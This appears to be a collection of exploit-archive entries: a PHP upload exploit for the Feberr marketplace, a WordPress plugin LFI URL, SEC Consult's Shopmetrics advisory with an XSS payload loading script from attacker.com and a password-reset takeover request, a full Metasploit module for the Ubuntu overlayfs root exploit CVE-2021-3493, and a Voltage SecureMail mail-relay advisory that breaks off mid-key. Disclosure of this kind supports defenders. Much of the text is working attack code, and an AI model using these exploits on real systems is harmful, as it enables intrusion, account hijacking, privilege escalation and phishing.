<pre><code># Exploit Title: Feberr - Multivendor Digital Products Marketplace arbitrary file upload<br /># Version 12.7<br /># Google Dork: N/A<br /># Date: 24/01/2022<br /># Exploit Author: Sohel Yousef - sohel.yousef@yandex.com<br /># Software Link: https://www.codester.com/items/14224/feberr-multivendor-digital-products-marketplace<br /># Software link 2 :https://www.codecanor.com/product/feberr-multivendor-digital-products-marketplace/<br /># Software Demo : https://overtasks.com/demo/feberr<br /># Category: webapps<br /><br />Feberr - Multivendor Digital Products Marketplace contain arbitrary file upload<br />registered vendor can upload .php files in edit-item section using tinymce with use of intercept tool in burbsuite to edit the raw<br /><br />details <br /><br />after register as vendor on the system go and edit or add an item in the section of detailes there tinymce<br />direct link :<br />https://localhost/feberr/edit-item/<br /><br /><br /><br />POST /demo/feberr/upload HTTP/1.1<br />Host: localhost <br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0<br />Accept: */*<br />Accept-Language: ar,en-US;q=0.7,en;q=0.3<br />Accept-Encoding: gzip, deflate<br />Content-Type: multipart/form-data; boundary=---------------------------429310566417994448462725662126<br />Content-Length: 179156<br />Origin: https://overtasks.com<br />Connection: close<br />Referer: https://localhost /demo/feberr/edit-item/PFRLZAmzwdWFNWnlgxUaxbLIO<br />Cookie: XSRF-TOKEN=eyJpdiI6InNxSGJaQjZ0UDYzamhnT2lXL09FWmc9PSIsInZhbHVlIjoiOEZCSVBnL3orczdpc2p4RE40ZmhlWCtKck1UNURET2EwWTdyeEtDVUR0Q1pMa2RLSXphSjNTbWJnRVlNS3Jld1U2d1lucWRNMDg1RVUybWdXTlMzMDAzUHcrdjNiM0IyWXRDbk01dzJJZU0zK3ZOWFlVM2JkTFRTZzdMMGhmN1UiLCJtYWMiOiIzYzU2ZTFkNThjZGQ5ZTI0ZWNiNzUzNWEyM2E4ZTk0OTZlZWYzMDc2NDAxOWU5NjZhNjkzNzQ5ZTIzMTA2NGRjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkNKa1RRUHgvVStWYy85MkNuVFI2RlE9PSIsInZhbHVlIjoiUk8vMWMrS0NNLzczUWdSdFBnck1sSmdzVUhkckdQYUtORlczSGFDNWRJN1MvbGx0VGFNUkVCTS9jb1I3L25PbkdBc29hODltMXVTTVlxQVlIQ1FSaWtmVWwzWkNYVUlOQUk2Q04zbmwxdzRSQXdiRTF4WVhTTy9IaWp0V2dwM0UiLCJtYWMiOiIzMDY1ODI4ODkwZTczNjJkNjZhYmE3YjJiZWFiNzA0ODNhNTdmY2RkYjFhMmFlODQ3MTg1OTAyMDFiNWM1NjMwIiwidGFnIjoiIn0%3D<br />Sec-Fetch-Dest: empty<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Site: same-origin<br /><br />-----------------------------429310566417994448462725662126<br />Content-Disposition: form-data; name="file"; filename="blobid1643057738041.jpg" >>>>>>>>>>>>>>> CHANGE THIS TO .php<br />Content-Type: image/jpeg<br /><br /><br />you will have the direct link to your uploaded file using tinymce editor <br /><br /><br /><br /><br /><br /><br /></code></pre>
<pre><code># Exploit Title: WordPress Plugin All-in-One Video Gallery plugin 2.4.9 - Local File Inclusion (LFI) <br /># Exploit Author: Mohamed Magdy Abumusilm Aka m19o <br /># Software: All-in-One Video Gallery plugin <br /># Version: <= 2.4.9<br /># Tested on: Windows,linux <br /><br />Poc: https://example.com/wordpress/wp-admin/admin.php?page=all-in-one-video-gallery&tab=../../../../../poc<br /><br />Decription : Authenticated user can exploit LFI vulnerability in tab parameter.<br /><br />Vulnerable code block : https://i.ibb.co/hXRcSQp/1123.png<br /><br />You can find a writeup at my blog : https://m19o.github.io/posts/How-i-found-my-first-0day/<br /><br /></code></pre>
<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20220202-0 ><br />=======================================================================<br /> title: Broken access control & Cross-Site Scripting<br /> product: Shopmetrics Mystery Shopping Software<br /> vulnerable version: SaaS platform before v21-11<br /> fixed version: SaaS platform v21-11<br /> CVE number: n/a for SaaS<br /> impact: Critical<br /> homepage: https://www.shopmetrics.com/<br /> found: 2021-05-06<br /> by: D. Zalmanov (Office Moscow)<br /> A. Vodyasov (Office Moscow)<br /> SEC Consult Vulnerability Lab<br /><br /> An integrated part of SEC Consult, an Atos company<br /> Europe | Asia | North America<br /><br /> https://www.sec-consult.com<br /><br />=======================================================================<br /><br />Vendor description:<br />-------------------<br />"Founded in 2004, Shopmetrics is a company that offers technology platform<br />solutions to mystery shopping and market research providers worldwide. Today<br />Shopmetrics is a global organization with offices in North America and Europe.<br />With over 80 full-time, dedicated developers and product specialists we are<br />committed to providing technology that is the industry benchmark in mystery<br />shopping and market research."<br /><br />Source: https://shopmetrics.com/Company.asp<br /><br /><br />Business recommendation:<br />------------------------<br />The solution is provided as software as a service. The current version as of v21-11<br />already contains the fix and all users should be protected.<br /><br />An in-depth security analysis performed by security professionals is highly<br />advised, as the software may be affected from further security issues.<br /><br /><br />Vulnerability overview/description:<br />-----------------------------------<br />1) Reflected cross site scripting<br />A reflected cross site scripting vulnerability was identified on<br />various input fields in the application. An attacker is able to perform actions<br />in the context of the attacked user by exploiting this vulnerability.<br /><br /><br />2) Broken Access Control<br />Users of the web application are required to supply a username and password<br />combination in order to login. This identification mechanism is used in order<br />to ensure that only those who possess the proper credentials are able to login<br />to the application, while unauthorized users cannot.<br /><br />A user who has forgotten or misplaced their password is able to request that<br />their password be reset by supplying a valid email address.<br /><br />Therefore, it is of the utmost importance to ensure that unauthorized users –<br />whether accidentally or intentionally – will not be able to step outside the scope<br />of their permission boundaries. This means, inter alia, that the tier’s logic may<br />not be manipulated by the client-side input and that the logic is confined to<br />parameters defined solely by the server.<br /><br />It was identified that due to flaws in the authorization scheme, an authorization<br />bypass vulnerability allows an attacker to get access to the restricted<br />password reset functionality, which allows an attacker with knowledge of a valid<br />email address, to reset any password and hijack a user account.<br /><br /><br />Proof of concept:<br />-----------------<br />1) Reflected cross site scripting<br />The request to create a new user looks like the following:<br /><br />-------------------------------------------------------------------------------<br />POST /document.asp?alias=mystadministration.user.manage HTTP/2<br />[...]<br /><br />CreateUser_mode=INSERT_COMMIT&PCmsFormID=CreateUser&securityuserobjectid=&type=&Login=&password=password%21&<br />firstname=xyz&lastname=xyz&companyname=xyz&gender=M&address1=xyz&address2=xyz&city=xyz&<br />state_region=BD&country=GB&language=en-us&postalcode=12312&phonehome=2131221321321&phonework=2132132121321&<br />phonemobile=32132121321&fax=213321321321&email=user%40victim.com&timezone=27&defaultWelcomePage=&isdisabled=N<br />-------------------------------------------------------------------------------<br /><br />In a live attack scenario the following JavaScript code will be hosted on the<br />attacker's server.<br /><br />-------------------------------------------------------------------------------<br />var data="CreateUser_mode=INSERT_COMMIT&PCmsFormID=CreateUser&securityuserobjectid=&type=&Login=&password=password%21&<br />firstname=xyz&lastname=xyz&companyname=xyz&gender=M&address1=xyz&address2=xyz&<br />city=xyz&state_region=BD&country=GB&language=en-us&postalcode=12312&phonehome=2131221321321&<br />phonework=2132132121321&phonemobile=32132121321&fax=213321321321&email=user%40victim.com&<br />timezone=27&defaultWelcomePage=&isdisabled=N";<br />var url="https://shopmetricshost/document.asp?alias=mystadministration.user.manage";<br />var http=new XMLHttpRequest();<br /><br />http.open('POST', url, true);<br />http.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');<br />http.send(data)<br />-------------------------------------------------------------------------------<br /><br />When the logged-in victim clicks on the following link, the script will be executed<br />in the context of the browser and the new user will be created.<br /><br />-------------------------------------------------------------------------------<br />https://shopmetricshost/open/data.asp?post={%22action%22:%22exec%22,%22dataset%22:<br />{%22datasetname%22:%22/System/Platform/Globalization/LiteralsGetTranslations%22,%22dataformat%22:%22simple%22,%22datafieldproperties%22:{%22columns%22:[%22name%22]}},<br />%22parameters%22:[{%22name%22:%22LiteralIDs%22,<br />%22value%22:%22XXX%3C%3E%3Chtml%3E%3Cscript+src%3dhttps%3a//attacker.com%3a4443/payload.js%3E%3C/script%3E%3C/html%3EYYY%22}]}<br />-------------------------------------------------------------------------------<br /><br /><br />2) Broken Access Control<br />There is a password reset functionality in the application. The following request is<br />sent when the user tries to reset the password.<br /><br />-------------------------------------------------------------------------------<br />POST /open/data.asp HTTP/2<br />[...]<br /><br />post={"action"%3a"getdata","dataset"%3a{"datasetname"%3a"/System/Platform/Entities/EntityExecuteActionV2",<br />"dataformat"%3a"simple","datafieldproperties"%3a{"columns"%3a["name"]}},<br />"parameters"%3a[{"name"%3a"SecurityObjectUserID","value"%3anull},{"name"%3a"Action","value"%3a"U"},<br />{"name"%3a"EntityName","value"%3a"ChangePassword"},{"name"%3a"EntityInstanceID","value"%3anull},<br />{"name"%3a"ViewStateEventLogAddChunk","value"%3a"¬H¬2¬¬S¬1619442013259¬ ¬aa¬¬2021-04-13_11%3a21%3a¬- ¬P¬¬34|<br />BEBC7966-668A-4AC6-B3DE-1180EB3F8704¬S¬0¬- ¬F¬2¬9543¬S¬1¬- ¬I¬¬¬S¬2¬- D¬B¬0¬1¬V-6¬- D¬y¬¬user%40victim.com¬T¬0¬- D¬q.D¬1¬0¬T¬1¬- F¬S¬1¬0¬¬0¬- <br />F¬C¬1¬0¬T¬0¬- x¬S¬1¬0¬¬1¬- x¬C¬1¬0¬T¬0¬- XYZ¬V¬0¬3¬¬101¬- y¬y¬¬newpass¬U¬15162¬- y¬B¬0¬1¬V¬13¬- z¬y¬¬newpass¬U¬5983¬- <br />z¬B¬0-1¬V¬3¬-"},{"name"%3a"EntityAttachmentsList","value"%3anull},{"name"%3a"MiscSettings","value"%3a"[NOREAD][MISC_TOKEN%3aD196E12C550147DEB073F4A1C64EF782B25746008F334B36A6F35A0929AD98DB]"}]}<br />-------------------------------------------------------------------------------<br /><br />There is no integrity check of the parameters of this request. Therefore, an attacker<br />can supply any email to this request and the password of the account, which is connected<br />to the supplied e-mail, will be changed to the password value controlled by an attacker. For example,<br />the request to change the password of the admin user with e-mail admin@victim.com (Administrator user).<br /><br />-------------------------------------------------------------------------------<br />POST /open/data.asp HTTP/2<br />[...]<br /><br />post={"action"%3a"getdata","dataset"%3a{"datasetname"%3a"/System/Platform/Entities/EntityExecuteActionV2",<br />"dataformat"%3a"simple","datafieldproperties"%3a{"columns"%3a["name"]}},"parameters"%3a[{"name"%3a"SecurityObjectUserID","value"%3anull},{"name"%3a"Action","value"%3a"U"},{"name"%3a"EntityName","value"%3a"ChangePassword"},<br />{"name"%3a"EntityInstanceID","value"%3anull},{"name"%3a"ViewStateEventLogAddChunk","value"%3a"¬H¬2¬¬S¬1619442013259¬ ¬aa¬¬2021-04-13_11%3a21%3a15¬¬0¬- <br />¬ab¬-Mozilla/5.0+(Windows+NT+10.0%3b+Win64%3b+x64%3b+rv%3a88.0)+Gecko/20100101+Firefox/88.0¬¬1¬- ¬P¬¬34|<br />BEBC7966-668A-4AC6-B3DE-1180EB3F8704¬S¬0¬- ¬F¬2¬9543¬S¬1¬- ¬I¬¬¬S¬2¬- D¬B¬0¬1¬V-6¬- D¬y¬¬admin%40victim.com¬T¬0¬- D¬q.D¬1¬0¬T¬1¬- F¬S¬1¬0¬¬0¬- <br />F¬C¬1¬0¬T¬0¬- x¬S¬1¬0¬¬1¬- x¬C¬1¬0¬T¬0¬- XYZ¬V¬0¬3¬¬101¬- y¬y¬¬AttackerPassword¬U¬15162¬- y¬B¬0¬1¬V¬13¬- z¬y¬-AttackerPassword¬U¬5983¬- <br />z¬B¬0¬1¬V¬3¬-"},{"name"%3a"EntityAttachmentsList","value"%3anull},<br />{"name"%3a"MiscSettings","value"%3a"[NOREAD][MISC_TOKEN%3aD196E12C550147DEB073F4A1C64EF782B25746008F334B36A6F35A0929AD98DB]"}]}<br />-------------------------------------------------------------------------------<br /><br />After this request an attacker can successfully login as admin user with the<br />password "AttackerPassword".<br /><br /><br />Vulnerable / tested versions:<br />-----------------------------<br />No version number is available as the solution is provided as software as a service (SaaS).<br />The product was affected by the vulnerability during the timeframe of the test and until<br />it was fixed later in 2021.<br /><br /><br />Vendor contact timeline:<br />------------------------<br />The vendor was contacted through a third party. The vendor confirmed on 7th<br />December 2021 that the advisory could be published.<br /><br /><br />Solution:<br />---------<br />The solution is provided as software as a service. The current version as of v21-11<br />contains the fix and all users should be protected.<br /><br /><br />Workaround:<br />-----------<br />None<br /><br /><br />Advisory URL:<br />-------------<br />https://sec-consult.com/vulnerability-lab/<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />SEC Consult Vulnerability Lab<br /><br />SEC Consult, an Atos company<br />Europe | Asia | North America<br /><br />About SEC Consult Vulnerability Lab<br />The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an<br />Atos company. It ensures the continued knowledge gain of SEC Consult in the<br />field of network and application security to stay ahead of the attacker. The<br />SEC Consult Vulnerability Lab supports high-quality penetration testing and<br />the evaluation of new offensive and defensive technologies for our customers.<br />Hence our customers obtain the most current information about vulnerabilities<br />and valid recommendation about the risk profile of new technologies.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Interested to work with the experts of SEC Consult?<br />Send us your application https://sec-consult.com/career/<br /><br />Interested in improving your cyber security with the experts of SEC Consult?<br />Contact our local offices https://sec-consult.com/contact/<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Mail: research at sec-consult dot com<br />Web: https://www.sec-consult.com<br />Blog: http://blog.sec-consult.com<br />Twitter: https://twitter.com/sec_consult<br /><br />EOF D. Zalmanov, A. Vodyasov / @2022<br /><br /><br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Local<br /> Rank = GreatRanking<br /><br /> prepend Msf::Exploit::Remote::AutoCheck<br /> include Msf::Post::Linux::Priv<br /> include Msf::Post::Linux::System<br /> include Msf::Post::Linux::Compile<br /> include Msf::Post::Linux::Kernel<br /> include Msf::Post::File<br /> include Msf::Exploit::EXE<br /> include Msf::Exploit::FileDropper<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => '2021 Ubuntu Overlayfs LPE',<br /> 'Description' => %q{<br /> This module exploits a vulnerability in Ubuntu's implementation of overlayfs. The<br /> vulnerability is the result of failing to verify the ability of a user to set the<br /> attributes in a running executable. Specifically, when Overlayfs sends the set attributes<br /> data to the underlying file system via `vfs_setxattr`, it fails to first verify the data<br /> by calling `cap_convert_nscap`.<br /> This vulnerability was patched by moving the call to `cap_convert_nscap`<br /> into the `vfs_setxattr` function that sets the attribute, forcing verification every time the<br /> `vfs_setxattr` is called rather than trusting the data was already verified.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'ssd-disclosure',<br /> 'bwatters-r7' # Aka @tychos_moose, Metasploit Module<br /> ],<br /> 'DisclosureDate' => '2021-04-12',<br /> 'Platform' => [ 'linux' ],<br /> 'SessionTypes' => [ 'shell', 'meterpreter' ],<br /> 'Privileged' => true,<br /> 'References' => [<br /> [ 'CVE', '2021-3493' ],<br /> [ 'URL', 'https://ssd-disclosure.com/ssd-advisory-overlayfs-pe/' ],<br /> [ 'URL', 'https://github.com/briskets/CVE-2021-3493' ]<br /> ],<br /> 'Notes' => {<br /> 'Reliability' => [ REPEATABLE_SESSION ],<br /> 'Stability' => [ ],<br /> 'SideEffects' => [ ARTIFACTS_ON_DISK ]<br /> },<br /> 'Targets' => [<br /> [<br /> 'x86_64',<br /> {<br /> 'Arch' => [ ARCH_X64 ]<br /> }<br /> ],<br /> [<br /> 'aarch64',<br /> {<br /> 'Arch' => [ ARCH_AARCH64 ]<br /> }<br /> ]<br /> ],<br /> 'DefaultTarget' => 0<br /> )<br /> )<br /> register_options [<br /> OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', ['Auto', 'True', 'False']])<br /> ]<br /> register_advanced_options [<br /> OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])<br /> ]<br /> end<br /><br /> def check<br /> arch = kernel_hardware<br /><br /> unless arch.include?('x86_64') || arch.include?('aarch64')<br /> return CheckCode::Safe("System architecture #{arch} is not supported")<br /> end<br /><br /> release = kernel_release<br /> version = kernel_version<br /><br /> unless userns_enabled?<br /> return CheckCode::Safe('Unprivileged user namespaces are not permitted')<br /> end<br /><br /> vprint_good('Unprivileged user namespaces are permitted')<br /><br /> # If the target is Ubuntu...<br /> unless version =~ /[uU]buntu/<br /> return CheckCode::Safe('Target is not Ubuntu!')<br /> end<br /><br /> version_array = release.split('-')<br /> if version_array.length < 2<br /> fail_with(Failure::UnexpectedReply, 'The target Ubuntu server does not have the expected kernel version format!')<br /> end<br /> vprint_status("Version array: #{version_array}")<br /> major_version = Rex::Version.new(version_array[0])<br /> vprint_status("major_version: #{major_version}")<br /> minor_version = version_array[1]<br /> vprint_status("minor_version: #{minor_version}")<br /> lower_bound_version = Rex::Version.new(3.13)<br /> upper_bound_version = Rex::Version.new(5.14)<br /> if major_version > upper_bound_version || major_version < lower_bound_version<br /> return CheckCode::Safe("The target version #{major_version} is outside the vulnerable version range #{lower_bound_version}-#{upper_bound_version}")<br /> end<br /><br /> return CheckCode::Appears<br /> end<br /><br /> def exploit<br /> if is_root? && !datastore['ForceExploit']<br /> fail_with(Failure::None, 'Session already has root privileges. Set ForceExploit to override.')<br /> end<br /> base_dir = datastore['WritableDir'].to_s<br /> unless writable?(base_dir)<br /> fail_with(Failure::BadConfig, "#{base_dir} is not writable")<br /> end<br /><br /> executable_name = ".#{rand_text_alphanumeric(5..10)}"<br /> exploit_dir = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"<br /> exploit_path = "#{exploit_dir}/#{executable_name}"<br /> if file_exist?(exploit_dir)<br /> fail_with(Failure::BadConfig, 'Exploit dir already exists')<br /> end<br /> mkdir(exploit_dir)<br /> register_dir_for_cleanup(exploit_dir)<br /><br /> # Upload exploit<br /> arch = kernel_hardware<br /> vprint_status("Detected architecture: #{arch}")<br /> if (arch.include?('x86_64') && payload.arch.first.include?('aarch')) || (arch.include?('aarch') && !payload.arch.first.include?('aarch'))<br /> fail_with(Failure::BadConfig, 'Host/payload Mismatch; set target and select matching payload')<br /> end<br /> if live_compile?<br /> vprint_status('Live compiling exploit on system...')<br /> upload_and_compile(exploit_path, exploit_source('CVE-2021-3493', 'cve_2021_3493.c'))<br /> else<br /> vprint_status 'Dropping pre-compiled exploit on system...'<br /> if arch.include?('x86_64')<br /> precompiled_binary = 'cve_2021_3493.x64.elf'<br /> vprint_status("Dropping pre-compiled exploit #{precompiled_binary} on system...")<br /> upload_and_chmodx exploit_path, exploit_data('CVE-2021-3493', precompiled_binary)<br /> elsif arch.include?('aarch64')<br /> precompiled_binary = 'cve_2021_3493.aarch64.elf'<br /> vprint_status("Dropping pre-compiled exploit #{precompiled_binary} on system...")<br /> upload_and_chmodx exploit_path, exploit_data('CVE-2021-3493', precompiled_binary)<br /> else<br /> fail_with(Failure::NoTarget, "Unknown architecture: '#{arch}'")<br /> end<br /><br /> end<br /> register_file_for_cleanup(exploit_path)<br /><br /> # Upload payload<br /> payload_path = "#{exploit_dir}/.#{rand_text_alphanumeric(5..10)}"<br /> upload_and_chmodx(payload_path, generate_payload_exe)<br /><br /> # Launch exploit<br /> print_status('Launching exploit...')<br /> random_string = rand_text_alphanumeric(5..10)<br /> cmd_string = "#{exploit_path} #{payload_path} #{exploit_dir} #{random_string}"<br /> vprint_status("Running: #{cmd_string}")<br /> begin<br /> output = cmd_exec(cmd_string)<br /> vprint_status(output)<br /> rescue Error => e<br /> elog('Caught timeout. Exploit may be taking longer or it may have failed.', error: e)<br /> print_error("Exploit failed: #{e}")<br /> ensure<br /> # rmdir() fails here on mettle payloads, so I'm just shelling out the rm for the exploit directory.<br /> cmd_exec("rm -rf '#{exploit_dir}'")<br /> end<br /> end<br />end<br /></code></pre>
<pre><code>Security Advisory<br />=======================================================================<br /> title: Business Logic Bypass - Mail Relay<br /> (Post-authenticated)<br /> product: Voltage SecureMail Server<br /> vulnerable version: Voltage SecureMail Server <v7.3.0.1<br /> fixed version: Voltage SecureMail Server v7.3.0.1<br /> CVE number: CVE-2021-38130<br /> impact: Medium<br /> homepage: https://www.microfocus.com/en-us/cyberres/data-privacy-protection/secure-mail<br /> found: 2021-06-25<br /> by: TING Meng Yean (GIS Red Team)<br /> United Overseas Bank Limited (UOB)<br /><br />=======================================================================<br /><br />Vendor description:<br />-------------------<br />Voltage SecureMail simplifies compliance to privacy regulations,<br />including MA, PCI, HITECH, UK FSA, and EU Data privacy directives,<br />and mitigates the risk of email security breaches. Voltage SecureMail<br />provides end-to-end security for email and attachments, inside the<br />enterprise to the desktop, at the enterprise gateway, and across<br />leading mobile smartphones and tablets. The solution provides the<br />confidence and peace of mind that sensitive data is protected in<br />transit and in storage, wherever it is in an email system to any<br />inbox (e.g., Outlook, Lotus Notes, Gmail, and Yahoo!), without<br />disrupting existing email services or business processes.<br /><br />Source: http://www.securemailworks.com/SecureMail.asp<br /><br /><br />Business recommendation:<br />------------------------<br />The vendor provides a patch and users of this product are urged to<br />upgrade to the latest version available.<br /><br />Reference: https://portal.microfocus.com/s/article/KM000003667<br /><br />An in-depth security analysis performed by security professionals is<br />highly advised, as the software may be affected from further security<br />issues.<br /><br /><br />Vulnerability overview/description:<br />-----------------------------------<br />Business Logic Bypass - Mail Relay (Post-authenticated)<br />- CVE CVE-2021-38130<br />- CWE-284: Improper Access Control<br />- CVSSv3: 5.4 (Medium)<br />https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N<br /><br /><br />Voltage SecureMail is an email protection service that provides email<br />encryption. With each secure email, there is an HTML attachment named<br />"message_zdm.html" that furnishes access to the Zero Download Messenger<br />(ZDM), which can be a web portal or mobile app. The encrypted body of<br />the original message as well as any attachments to the original email<br />is contained within this attachment.<br /><br />The email recipient needs to install Voltage SecureMail app (for mobile) or<br />browse to the Voltage SecureMail Server portal (desktop) to authenticate and<br />view any secure email and attachments sent via ZDM.<br /><br />When the recipient opens the "message_zdm.html" file for the first time<br />on a desktop, the browser is brought to the corporation's SecureMail<br />portal where the user has to create a password in order to continue.<br /><br />An email verification email is sent to the recipient with a One Time Link,<br />and the recipient can read the email on the SecureMail portal after clicking<br />on the link.<br /><br />If the recipient opens the "message_zdm.html" file again in the future,<br />the recipient has to input the previously created password.<br /><br />When viewing the email on the SecureMail portal, the recipient can<br />choose to reply to the email by clicking "Reply" or "Reply to All".<br />The SecureMail portal only allows the recipient to reply to the<br />original email sender and to the email addresses in the Cc/Bcc list.<br />However, it is possible to modify the original email addresses in the<br />"to", "cc" or "bcc" fields, or to add arbitrary email addresses, by<br />sending a special POST request.<br /><br />As the SecureMail portal displays the logo and valid SSL certificate of<br />the corporation in use, an attacker who have received a SecureMail encrypted<br />email previously can make use of the SecureMail portal to send phishing<br />emails to third parties. Note that the attacker is unable to spoof<br />the "from" address, so the emails to third parties will be from the<br />attacker's email address.<br /><br /><br />Proof of concept:<br />-----------------<br />When the recipient replies to the email by clicking "Reply" or "Reply to All", the<br />recipient is brought to the "Compose New Message" page. To send the email reply,<br />the recipient then clicks on the "Send Secure" button.<br /><br />The SecureMail portal does not allow the modification of the "to", "cc" or<br />"bcc" field if the user attempts to intercept the POST request after<br />clicking on the "Send Secure" button.<br /><br />However, if the user attempts to intercept the POST request after<br />clicking on the "Plain Text" button, the modification of the "to", "cc" or<br />"bcc" field is successful.<br /><br />The modified email is then successfully sent out after the user<br />click on the "Send Secure" button.<br /><br />It is noted that there is one difference in the POST request parameters<br />between a "Send Secure" and "Plain Text" that allows the "to", "cc" and<br />"bcc" fields to be modified, and the difference is the "send" versus "x"<br />parameters. The rest pf the contents of the "Send Secure" and "Plain Text"<br />POST requests are almost identical.<br /><br /><br /><br />Original "Send Secure" Request<br />########################################################################<br />POST /writer/br/<...snipped...>?messageId=8243308068279188139899373802011392625 HTTP/1.1<br />Host: <...snipped...><br />Cookie: JSESSIONID=<...snipped...>; zdmSessionId=<...snipped...>; zdmIdentity=<...snipped...>; CSRFToken=<...snipped...><br />Content-Type: multipart/form-data; boundary=---------------------------289584800395870328816642372<br />Te: trailers<br /><br />-----------------------------289584800395870328816642372<br />Content-Disposition: form-data; name="CSRFToken"<br /><br /><...snipped...><br />-----------------------------289584800395870328816642372<br />Content-Disposition: form-data; name="c"<br /><br />c3<br />-----------------------------289584800395870328816642372<br />Content-Disposition: form-data; name="h"<br /><br />h924481124<br />-----------------------------289584800395870328816642372<br />Content-Disposition: form-data; name="send"<br /><br />send<br />-----------------------------289584800395870328816642372<br />Content-Disposition: form-data; name="senderKeyEnc"<br /><br /><...snipped...><br />-----------------------------289584800395870328816642372<br />Content-Disposition: form-data; name="to"<br /><br />original.sender@corp.com<br />-----------------------------289584800395870328816642372<br />Content-Disposition: form-data; name="showCcEnabled"<br /><br />on<br />-----------------------------289584800395870328816642372<br />Content-Disposition: form-data; name="cc"<br /><br /><br />-----------------------------289584800395870328816642372<br />Content-Disposition: form-data; name="bcc"<br /><br /><br />-----------------------------289584800395870328816642372<br />Content-Disposition: form-data; name="subject"<br /><br />RE: <...snipped...><br />-----------------------------289584800395870328816642372<br />Content-Disposition: form-data; name="attachment"; filename=""<br />Content-Type: application/octet-stream<br /><br /><br />-----------------------------289584800395870328816642372<br />Content-Disposition: form-data; name="editModeToggle"<br /><br />0<br />-----------------------------289584800395870328816642372<br />Content-Disposition: form-data; name="body"<br /><br /><...snipped...><br />-----------------------------289584800395870328816642372<br />########################################################################<br /><br /><br /><br /><br />Modified "Plain Text" request<br />########################################################################<br />POST /writer/br/<...snipped...>?messageId=8243308068279188139899373802011392625 HTTP/1.1<br />Host: <...snipped...><br />Cookie: JSESSIONID=<...snipped...>; zdmSessionId=<...snipped...>; zdmIdentity=<...snipped...>; CSRFToken=<...snipped...><br />Content-Type: multipart/form-data; boundary=---------------------------289584800395870328816642372<br />Te: trailers<br /><br />-----------------------------289584800395870328816642372<br />Content-Disposition: form-data; name="CSRFToken"<br /><br /><...snipped...><br />-----------------------------289584800395870328816642372<br />Content-Disposition: form-data; name="c"<br /><br />c3<br />-----------------------------289584800395870328816642372<br />Content-Disposition: form-data; name="h"<br /><br />h924481124<br />-----------------------------289584800395870328816642372<br />Content-Disposition: form-data; name="x"<br /><br />x<br />-----------------------------289584800395870328816642372<br />Content-Disposition: form-data; name="senderKeyEnc"<br /><br /><...snipped...><br />-----------------------------289584800395870328816642372<br />Content-Disposition: form-data; name="to"<br /><br />victim1@external.com<br />-----------------------------289584800395870328816642372<br />Content-Disposition: form-data; name="showCcEnabled"<br /><br />on<br />-----------------------------289584800395870328816642372<br />Content-Disposition: form-data; name="cc"<br /><br />victim2@external.com<br />-----------------------------289584800395870328816642372<br />Content-Disposition: form-data; name="bcc"<br /><br />victim3@external.com<br />-----------------------------289584800395870328816642372<br />Content-Disposition: form-data; name="subject"<br /><br />RE: <...snipped...><br />-----------------------------289584800395870328816642372<br />Content-Disposition: form-data; name="attachment"; filename=""<br />Content-Type: application/octet-stream<br /><br /><br />-----------------------------289584800395870328816642372<br />Content-Disposition: form-data; name="editModeToggle"<br /><br />1<br />-----------------------------289584800395870328816642372<br />Content-Disposition: form-data; name="body"<br /><br /><...snipped...><br />-----------------------------289584800395870328816642372--<br />########################################################################<br /><br /><br />As of the patched Voltage SecureMail Server version 7.3.0-259490, the<br />vulnerability for the "Plain Text" was no longer replicable. However, the same<br />vulnerability can be replicated using the "Attach" function.<br /><br /><br />Vulnerable / tested versions:<br />-----------------------------<br />The following version has been tested and found to be vulnerable:<br />* 7.3<br />* 7.3.0-259490<br /><br /><br />Vendor contact timeline (GMT+8):<br />--------------------------------<br />2021-06-25: Contacting vendor through their SecureMail product support team.<br />2021-06-28: Contacting Micro Focus Product Security Response Team (PSRT)<br /> security@microfocus.com to request for CVE number.<br />2021-06-29: Micro Focus PSRT opened PSRT case 80358.<br />2021-07-02: SecureMail product support team confirmed the vulnerability and<br /> working on patch.<br />2021-07-31: SecureMail product support team released test patch v7.3.0-259490.<br />2021-08-04: Confirmed vulnerability "Plain Text" function was no longer<br /> replicable, but the same vulnerability can be replicated using the<br /> "Attach" function. Notified the SecureMail product support team.<br />2021-11-11: SecureMail product support team released patch v7.3.0.1.<br />2022-01-21: Requested Micro Focus PSRT for updates.<br />2022-01-24: Micro Focus PSRT responded with assigned CVE number.<br />2022-01-29: Micro Focus PSRT published security bulletin.<br />2022-02-03: Coordinated release of security advisory.<br /><br /><br />Solution:<br />---------<br />According to the vendor, Voltage SecureMail resolved this vulnerability<br />in the version 7.3.0.1 patch release and customers should contact their support<br />representative for information about downloading and applying the patch.<br /><br /><br />Security Bulletin URL:<br />----------------------<br />https://portal.microfocus.com/s/article/KM000003667<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Meng Yean TING (GIS Red Team)<br />United Overseas Bank Limited (UOB)<br /><br />-----BEGIN PGP PUBLIC KEY BLOCK-----<br /><br />mQINBF5OZxUBEADpXPnK42+IIN4t2oP23y/9jaOsLT8jkfvAIjT1pnbhbI/wSTla<br />e+Lm6f64YPrFuvZgcAMLTv4gIXrhnwHYn6J5d56e9cnsZ4fuIw1fIAqivjGxJqDL<br 